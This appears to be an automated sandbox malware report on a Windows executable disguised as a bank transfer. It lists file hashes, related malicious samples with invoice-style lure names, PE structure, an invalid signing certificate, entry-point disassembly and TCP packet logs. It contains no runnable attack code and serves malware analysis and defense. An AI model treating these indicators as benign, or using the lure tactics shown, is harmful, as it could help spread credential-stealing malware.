Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:10:37	API Interceptor	2733x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.111.89.226	61c526c5-c558-462b-b5a9-138a62b439e5.exe	Get hash	malicious	Browse
	ztvxNYTInt.exe	Get hash	malicious	Browse
	aakmRhKRnh.exe	Get hash	malicious	Browse
	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse
	SmsSez3ev4Ak0Yi.exe	Get hash	malicious	Browse
	ZIN1964044051.exe	Get hash	malicious	Browse
	factura INVDE21005611.exe	Get hash	malicious	Browse
	Purchase Order A154347.exe	Get hash	malicious	Browse
	transfer_20211019.exe	Get hash	malicious	Browse
	ZIN1964044051.exe	Get hash	malicious	Browse
	factura 005048.exe	Get hash	malicious	Browse
	Orden de compra M244545.exe	Get hash	malicious	Browse
	Delivery note_241493.exe	Get hash	malicious	Browse
	Delivery note_241493.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WEBSUPPORT-SRO-SK-ASSK	61c526c5-c558-462b-b5a9-138a62b439e5.exe	Get hash	malicious	Browse	185.111.89.226
	ztvxNYTInt.exe	Get hash	malicious	Browse	185.111.89.226
	aakmRhKRnh.exe	Get hash	malicious	Browse	185.111.89.226
	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse	185.111.89.226
	SmsSez3ev4Ak0Yi.exe	Get hash	malicious	Browse	185.111.89.226
	4wQ0O3aafu.exe	Get hash	malicious	Browse	195.210.28.115
	ZIN1964044051.exe	Get hash	malicious	Browse	185.111.89.226
	factura INVDE21005611.exe	Get hash	malicious	Browse	185.111.89.226
	Purchase Order A154347.exe	Get hash	malicious	Browse	185.111.89.226
	transfer_20211019.exe	Get hash	malicious	Browse	185.111.89.226
	ZIN1964044051.exe	Get hash	malicious	Browse	185.111.89.226
	factura 005048.exe	Get hash	malicious	Browse	185.111.89.226
	Orden de compra M244545.exe	Get hash	malicious	Browse	185.111.89.226
	Delivery note_241493.exe	Get hash	malicious	Browse	185.111.89.226
	Delivery note_241493.exe	Get hash	malicious	Browse	185.111.89.226
	M2021-D-074.exe	Get hash	malicious	Browse	37.9.175.26
	Purchase Order.exe	Get hash	malicious	Browse	185.111.90.24
	xAXTvjBdeI.exe	Get hash	malicious	Browse	185.111.89.170
	60rUtFJPFb.exe	Get hash	malicious	Browse	37.9.175.3
	H0f7r2Mx4O.exe	Get hash	malicious	Browse	185.111.89.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	part-1500645108.xlsb	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	gXphSPTf52.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	VM845.html	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	Rl3M5OSf6P.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	#U0192#U0e25#U00a2_#U0192#U03b1#U0aee#U01ad#U00b5#U0ae8#U03b1_#U05e0jumozeK_Yim73678.vbs	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	DOC209272621615.PDF.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	item-40567503.xlsb	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	ATT14851.html	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	WMHighfield.html	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	5WJw8YWsvu.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	FACTURAS.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	RFQ 001030112021#U00b7pdf.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	item-107262298.xlsb	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	products samples pdf.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	item-1202816963.xlsb	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	draft_inv dec21.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	Nh3xqMPynb.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	#Encoder_n1.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97
	#Encoder_n2.exe	Get hash	malicious	Browse	142.250.185.78 142.250.185.97

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.216110090959714
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Transferencia_29_11_2021 17.03.39.exe
File size:	152688
MD5:	a70cf8fdf5c68e414bad4494a44f272a
SHA1:	4a974930db625492a8aa3f046759db6f3f057129
SHA256:	dd7883497ba8fc4a8fac606d4f3cec70b6d42c0017e320f9becb071d899c6c30
SHA512:	7279f30ac01665f31e4dd4ff11fb85954d9109953e1d3b041971cba8973e6b640eca8794223a5be3762d1911889ba12fc8b84c952b49f002f98f1e79ba6eb273
SSDEEP:	1536:4JE6l7m717UopmGeFgk1hG6dvlWOCQe1FpVfBRnOmk:KE6l7mh/UFgk1hG6GOC/lf2mk
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....7.K.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4B9437E6 [Sun Mar 7 23:33:58 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=ansvarslsere@Episcotister1.BON, CN=INDDRIVNING, OU=sporuloid, O=atomkraftvrks, L=Capsheaf, S=Appointed, C=CD
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	01/12/2021 11:06:33 01/12/2022 11:06:33
Subject Chain	E=ansvarslsere@Episcotister1.BON, CN=INDDRIVNING, OU=sporuloid, O=atomkraftvrks, L=Capsheaf, S=Appointed, C=CD
Version:	3
Thumbprint MD5:	29DB6066933764E6DBF96BB776031AF3
Thumbprint SHA-1:	7F5DF2711E99DDB2A16381EF8330D115FB1C72B2
Thumbprint SHA-256:	B038217303FB0C77E03FB5D245BB31AF36E8932DBBB944A0599B9F5ECB20D07C
Serial:	00

Entrypoint Preview

Instruction
push 004019CCh
call 00007F124C94C325h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [88474D5Dh], dh
dec edx
mov byte ptr [6CC034C0h], al
jnle 00007F124C94C32Fh
push cs
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebp
dec esi
inc edx
dec edi
dec esp
inc esp
inc ebp
dec esi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [edx-7BDFC270h], bh
jmp 00007F124C94C361h
dec ebp
cmp byte ptr [ebx-29h], FFFFFFE3h
je 00007F124C94C389h
pop ebp
adc esp, dword ptr [ebx-3Dh]
xchg eax, esi
mov bh, dl
mov al, byte ptr [E3B79F4Fh]
or cl, byte ptr [edx+ebp*4+4F3A977Ah]
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop eax
add byte ptr [eax], al
add byte ptr [ebx+00h], dl
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [edx+79h], ah
jc 00007F124C94C3ADh
outsb
add byte ptr [41001001h], cl
jnc 0000C39Eh
jnc 00007F124C94C39Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x213d4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x960	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24000	0x1470
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20ac4	0x21000	False	0.366751006155	data	5.29953521895	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x960	0x1000	False	0.175048828125	data	2.0387904916	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24830	0x130	data
RT_ICON	0x24548	0x2e8	data
RT_ICON	0x24420	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x243f0	0x30	data
RT_VERSION	0x24150	0x2a0	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	outrunner
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	outrunner.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 19:10:26.233319998 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.233407974 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.233653069 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.251113892 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.251173019 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.306022882 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.306325912 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.308559895 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.308835983 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.438261032 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.438328981 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.439003944 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.439232111 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.442595005 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.483902931 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.780750990 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.780905008 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.780946970 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.781088114 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.781126976 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.781240940 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.781276941 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.781411886 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.781469107 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.781610012 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.786427021 CET	49810	443	192.168.11.20	142.250.185.78
Dec 1, 2021 19:10:26.786504030 CET	443	49810	142.250.185.78	192.168.11.20
Dec 1, 2021 19:10:26.912821054 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.912864923 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:26.913135052 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.913451910 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.913490057 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:26.949390888 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:26.949527025 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.949532032 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.949573994 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.950048923 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:26.950207949 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.950212955 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.953821898 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.953953981 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:26.954102993 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.954454899 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:26.995893002 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.295030117 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.295214891 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.295423031 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.295551062 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.295595884 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.295634031 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.295783043 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.295826912 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.295840979 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.296335936 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.296586990 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.297116041 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.297965050 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.299897909 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.300190926 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.302145004 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.302350998 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.302398920 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.302583933 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.305573940 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.305763006 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.305805922 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.305965900 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.306003094 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306160927 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306173086 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.306199074 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306325912 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.306349993 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.306368113 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306512117 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.306721926 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306838989 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306906939 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.306948900 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.306988001 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.307128906 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.307693005 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.307846069 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.307900906 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.308145046 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.308193922 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.308415890 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.308631897 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.308794975 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.308851004 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.308893919 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.308984995 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.309123039 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.309475899 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.309640884 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.309644938 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.309694052 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.309891939 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.310313940 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.310473919 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.310481071 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.310520887 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.310681105 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.310717106 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.311126947 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.311291933 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.311292887 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.311340094 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.311501026 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.312819004 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.313009024 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.313060999 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.313114882 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.313169956 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.313237906 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.313267946 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.313308954 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.313402891 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.313457966 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.313486099 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.313762903 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316212893 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316378117 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316386938 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316437960 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316536903 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316589117 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316621065 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316726923 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316767931 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316803932 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316885948 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316909075 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.316956997 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.316988945 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.317106009 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.317147017 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.317435980 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.317641020 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.317642927 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.317692995 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.317831039 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.317867041 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.317892075 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.318042040 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.318290949 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.318453074 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.318474054 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.318495989 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.318695068 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.318743944 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.318938017 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.319224119 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.319425106 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.319477081 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.319623947 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.319678068 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.319730997 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.319827080 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.319861889 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.320533991 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.320734978 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.320775032 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.320980072 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.321017981 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321069956 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.321178913 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321238995 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321288109 CET	443	49811	142.250.185.97	192.168.11.20
